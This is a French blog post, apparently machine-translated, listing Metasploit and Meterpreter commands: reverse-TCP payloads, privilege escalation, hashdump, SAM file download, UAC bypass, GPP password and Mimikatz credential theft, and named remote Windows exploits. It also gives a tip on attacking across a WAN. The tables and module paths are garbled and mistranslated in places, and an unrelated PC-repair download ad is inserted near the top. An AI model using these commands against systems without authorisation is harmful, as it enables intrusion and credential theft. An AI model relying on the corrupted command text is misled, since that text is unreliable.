Liste des commandes Metasploit (2021)-Utilisez Metasploit comme un pro!

Vous souhaitez utiliser Metasploit Pro Framework ou Metasploit Unleashed ? Eh bien, vous devrez d’abord connaître leurs commandes !. Ci-dessous, nous partageons avec vous la dernière liste des commandes Metasploit de 2021 . Cette feuille de triche contient toutes les commandes dont vous aurez besoin, des bases pour avancer!

Trouvez et réparez automatiquement les erreurs de Windows grâce à l'outil de réparation de PC

Reimage est un excellent outil de réparation qui détecte et répare automatiquement différents problèmes du système d'exploitation Windows. Avoir cet outil protégera votre PC contre les codes malveillants, les défaillances matérielles et plusieurs autres bugs. En outre, cela vous permet également d'utiliser votre appareil au maximum de ses capacités et de ses performances.

  • Étape 1: Télécharger l'outil de réparation et d'optimisation des PC (Windows 11, 10, 8, 7, XP, Vista - Certifié Microsoft Gold).
  • Étape 2: Cliquez sur "Démarrer l'analyse" pour trouver les problèmes de registre de Windows qui pourraient être à l'origine des problèmes du PC.
  • Étape 3: Cliquez sur "Réparer tout" pour résoudre tous les problèmes.

Télécharger

Dans ce guide, nous parlerons des bases de la feuille de triche des commandes Metasploit qui peut être utilisé dans l’interface de ligne de commande. Il existe également de nombreuses autres consoles de ligne de commande disponibles sur Internet (telles que MSFConsole Command Line ) mais elles sont vraiment difficiles à utiliser et à comprendre.

Qu’est-ce que Metasploit Framework?

Metasploit est un produit qui peut être utilisé pour s’introduire dans un système distant et qui peut également être utilisé pour tester la vulnérabilité d’un système informatique. Comme tous les autres outils de sécurité de l’information, Metasploit peut également être utilisé à ces deux fins (activités non autorisées et légitimes). Le Rapid7 a également ajouté les deux éditions ou versions propriétaires appelées Metasploit Pro et Metasploit Express. Vous pouvez également voir certaines de nos commandes de Kali Linux Terminal pour le piratage.

Metasploit met en évidence le risque et la correction de bogues particuliers qui pourraient être disponibles sur votre ordinateur personnel (PC). Plus tard, l’outil de fuzzing a également été inclus dans le Metasploit 3.0 qui a été utilisé pour découvrir les vulnérabilités des logiciels même avec les exploits pour les bogues connus. Après un certain temps, le jeu d’outils sans fil lorcon (802.11) a également été ajouté au Metasploit 3.0 au mois de novembre 2006. Après toutes ces mises à jour, le Rapid7 a sorti Metasploit 4.0 au mois d’août 2011.

Vous pouvez récupérez Metasploit Pro Framework à partir de la page ci-dessous:

Téléchargez Metasploit Pro Framework gratuitement

Une brève histoire de Metasploit Framework

H. D. Moore a été le créateur de cet outil réseau portable nommé Metasploit utilisant Perl en 2003. En 2007, le Framework Metasploit a été totalement réécrit dans le Ruby. Le 21 er octobre 2009, le Metasploit a annoncé avoir été acheté ou acquis par le Rapid7. Rapid7 est une société de sécurité qui fournit de nombreux types de solutions unifiées de gestion des vulnérabilités.

Liste des dernières commandes Metasploit 2021 (nouveau)

  • Meterpreter Payloads:
  • Charge utile de Windows reverse meterpreter
Commande Description de CMD
set payload windows/meterpreter/reverse_tcp Windows reverse tcp payload

Charge utile Windows VNC pour Meterpreter

Commande  Description de CMD
set payload windows/vncinject/reverse_tcpset ViewOnly false Meterpreter Windows VNC Payload

 

Charge utile Linux Reverse Meterpreter

Commande Description de CMD
set payload linux/meterpreter/reverse_tcp Meterpreter Linux Reverse Payload

Commandes Meterpreter Cheat Sheet (2021 dernières)

Meterpreter télécharger le fichier à partir de la cible Windows < tr> portfwd delete –l 3389 –p 3389 –r cible Meterpreter supprime la fonction de transfert de port

Commande Description de CMD
télécharger le fichier c: \\ windows Meterpreter télécharge le fichier vers la cible Windows machine
télécharger c: \\ windows \\ repair \\ sam/tmp
télécharger c: \\ windows \\ repair \\ sam/tmp Meterpreter télécharge les fichiers depuis la machine cible Windows
exécute-fc: \\ windo ws\temp\exploit.exe Meterpreter exécute .exe sur la cible-pratique pour exécuter les exploits téléchargés
execute-f cmd-c Crée un nouveau canal à l’aide du shell cmd 
ps Meterpreter vous montre les processus actuels qui sont en cours d’exécution
shell Meterpreter obtient l’accès shell sur la machine ou le serveur cible
getsystem Meterpreter tente de faire remonter les privilèges pour accéder à la cible
hashdump Meterpreter tente de vider les hachages sur la cible
portfwd add –L 3389 –p 3389 –r cible Meterpreter crée un transfert de port vers la machine cible

 

Modules Metasploit communs et Modules Windows Metasploit à distance

Modules Metasploit Windows locaux Modules Metasploit auxiliaires utiliser un outil auxiliaire/scanner/mssql/mssql_login Metasploit MSSQL Credential Scanner utiliser le scanner auxiliaire/mysql/mysql_version  Lire aussi: Le guide parfait de DDoS comme un hacker professionnel. Modules Metasploit PowerShell  Post-Exploit Windows Metasploit Modules  exécuter post/windows/rassembler/win_privs privilèges d’affichage Metasploit de l’utilisateur actuel  Source: TheHackToday Les commandes de base de Metasploit que vous devez connaître en 2021 La commande Metasploit pour la mise à jour du Framework: La commande suivante mentionnée ci-dessus fournit la dernière version du Framework Metasploit mis à jour. La mise à jour indique ce qui suit que nous devons mettre à jour la mise à jour hebdomadaire de la copie de notre Framework Metasploit. Mais il y a un léger inconvénient à cette commande et c’est que l’exécution de cette commande peut corrompre ou casser la copie de votre logiciel qui est installée sur votre PC. Lecture recommandée : Haut 8 Meilleures distributions Linux pour le piratage et les tests de pénétration! Commandes Metasploit msfhelp/console: Lorsque vous exécutez Metasploit pour la première fois, la fenêtre suivante s’ouvre sur votre écran. Si vous ne savez rien ou n’avez aucune information relative au Metasploit, vous pouvez simplement taper: help pour afficher toutes les commandes et informations relatives au Metasploit.Je ne vais pas perdre votre temps en expliquant toutes les commandes sur le Metasploit mais je vais discuter de certaines des commandes de base et les plus utilisées que vous allez utiliser principalement.

  • Commandes de base: Ces commandes sont utilisées pour rechercher, utiliser , Back, Help, Info et Exit.
  • Commandes d’exploit: ces commandes sont utilisées pour définir des variables et afficher les options d’exploitation et les options d’évasion, les charges utiles et les encodeurs.
  • Commandes d’exécution d’exploit : Ces commandes sont utilisées pour exécuter et exécuter des exploits contre une cible spécifique.

Commandes Metasploit plus utiles: 

  • Commande de recherche:

Cette commande est utilisée pour rechercher différents types ou sortes de vulnérabilités et d’exploits provenant du msfconsole.

  • Commande Info:

Cette commande est utilisée pour garder un œil sur la documentation et jeter un œil au propriétaire de l’exploit. Lire: 8 meilleures façons de sécuriser votre serveur Linux (Linux Hardening Guide 2021).

  • Commande Afficher les options :

Avec l’aide de cette commande simple, nous pouvons utiliser les commandes show pour afficher toutes les valeurs requises par la charge utile qui peuvent ensuite être utilisées pour attaquer le PC ou la machine victime que nous voulons attaquer.

  • LHOST :

Avec l’aide de cette commande, vous pouvez facilement effectuer l’attaque du réseau WAN, il vous suffit de définir le LHOST sur l’adresse IP statique IP et tous les autres ports de transfert.

  • LPORT :

Si vous essayez sur le réseau LAN, vous n’avez pas besoin d’effectuer la redirection de port mais vous pouvez utiliser n’importe quel port que vous souhaitez utiliser. Mais si vous attaquez le réseau WAN, vous devez transférer le port que vous souhaitez attaquer respectivement.

  • Afficher les charges utiles :

Avec l’aide de cette commande, nous utilisons la commande show payloads. Cette commande renverra une liste complète de charges utiles compatibles pour l’exploit suivant. Dans l’image suivante, Metasploit a chargé de nombreuses charges utiles compatibles:

  • Afficher les cibles:

Cette commande renverra une liste complète des systèmes d’exploitation très vulnérables à l’exploit sélectionné ou choisi. Après avoir exécuté cette commande, nous obtenons la sortie suivante de l’exploit suivant: exploit adobe_flash_shader_drawing_fill.

  • Show Advanced:

En utilisant cette commande show advanced, nous pouvons afficher toutes les options avancées pour les exploits requis. Télécharger: Logiciel Nessus Professional Vulnerability Scanner.

  • Afficher les encodeurs:

Cette commande est utilisée pour renvoyer tous les encodeurs compatibles. Ces encodeurs sont utilisés pour contourner les signatures IDS/IPS simples qui ont été recherchées pour certains octets de la charge utile disponibles.

  • Show nops:

Cette commande renverra une liste complète des générateurs NOP. NOP est l’abréviation de No Operation et est utilisé pour changer le modèle pour contourner les IDS/IPS simples des traîneaux NOP courants. Ces générateurs NOP commencent avec toute une configuration d’architecture CPU dans son nom. Télécharger: Acunetix Web Vulnerability Scanner Free.Vous pouvez visiter le site officiel  Offensive Security pour les commandes AZ Metasploit complètes. Connaissez-vous d’autres commandes Metasploit que nous pouvons ajouter à cette liste? Dans cet article, nous avons discuté de la Liste des commandes Metasploit en 2021 , nous avons également parlé de nombreuses commandes différentes que vous pouvez utiliser pour effectuer diverses tâches et toutes les différentes fonctionnalités. C’est une méthode totalement sûre pour utiliser et effectuer la vérification de vulnérabilité et pour résoudre tous ces problèmes connexes. J’espère que ce guide vous sera vraiment utile. Partagez-le avec vos amis et votre famille pour les aider à résoudre leurs problèmes. Si vous avez des questions, laissez-les dans la section des commentaires. Nous sommes toujours là pour vous aider si vous avez besoin d’aide.

Commande Description de CMD
use exploit/windows/smb/ms08_067_netapi MS08_067 Exploit à distance Windows 2k, XP, 2003
use exploit/windows/dcerpc/ms06_040_netapi MS08_040 Windows NT, 2k, XP, 2003 Exploit à distance
use exploit/windows/smb/
ms09_050_smb2_negotiate_func_index
MS09_050 Windows Vista SP1/Exploit à distance SP2 et Server 2008 (x86)
Commande Description de CMD
utilisez exploit/windows/local/bypassuac Contourner l’UAC sous Windows 7 + Définir cible + arch, x86/64 
Commande Description de CMD
use auxiliaire/scanner/http/dir_scanner Scanner de répertoires HTTP Metasploit
utiliser le/scanner auxiliaire/http/jboss_vulnscan Scanner de vulnérabilité Metasploit JBOSS
Metasploit MSSQL Version Scanner utiliser auxiliaire/scanner/oracle/oracle_login Module de connexion Oracle Metasploit
Commande Description de CMD
use exploit/multi/script/web_delivery Module de livraison de charge utile Metasploit PowerShell
post/windows/manage/powershell/exec_powershell Metasploit upload et exécute le script PowerShell via une session
use exploit/multi/http/jboss_maindeployer Metasploit JBOSS deploy
utiliser exploit/windows/mssql/mssql_payload Metasploit MSSQL payload
Commande Description de CMD
utiliser post/windows/collecte/credentials/gpp Metasploit saisit les mots de passe enregistrés GPP
oad mimikatz-u0026 gt; wdigest Metasplit load Mimikatz
run post/windows/together/local_admin_search_enum Identifiez les autres machines auxquelles l’utilisateur du domaine fourni a un accès administratif
mise à jour apt; apt install metasploit-framework
LIRE:   5 meilleurs émulateurs Android pour Mac 2021-Applications Android sur MacOS

adminguides

Laisser un commentaire